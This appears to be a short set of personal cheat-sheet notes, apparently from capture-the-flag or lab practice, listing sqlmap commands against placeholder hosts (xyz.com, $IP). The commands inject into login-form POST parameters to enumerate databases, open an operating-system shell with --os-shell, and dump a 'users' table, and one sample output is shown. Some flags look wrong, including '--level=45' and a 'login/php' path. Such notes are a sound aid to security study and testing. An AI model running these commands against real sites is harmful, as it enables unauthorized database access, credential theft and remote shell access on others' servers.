SQLMap
Probe to find the Front-End DB
sqlmap -u "http://xyz.com/index.php" --data "username=test&password=test&submit=Submit" --method=POST --level=3 --dbms=mysql --dbs
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] Webapp ..Answer!
Discover OS
sqlmap -u http://xyz.com/ --data="username=test&password=test&debug=false"
sqlmap -u http://xyz.com/ --data="username=test&password=test&debug=false" --level=45
sqlmap -u http://xyz.com --data="username=test&password=test&debug=false" --method POST --os-shell
sqlmap -u http://xyz.com --data="username=test&password=test&submit=Submit" --method POST --os-shell
Favorites
sqlmap -u http://$IP/login/php --data="username=test&passwd=test&submit=Submit" --method POST --dbs --batch
sqlmap -u http://$IP/login.php --data="username=test&passwd=test&submit=Submit" --method POST --os-shell
Attempt
sqlmap -u http://$IP/staff_search.php?search=bob --dump -D website -T users
Last updated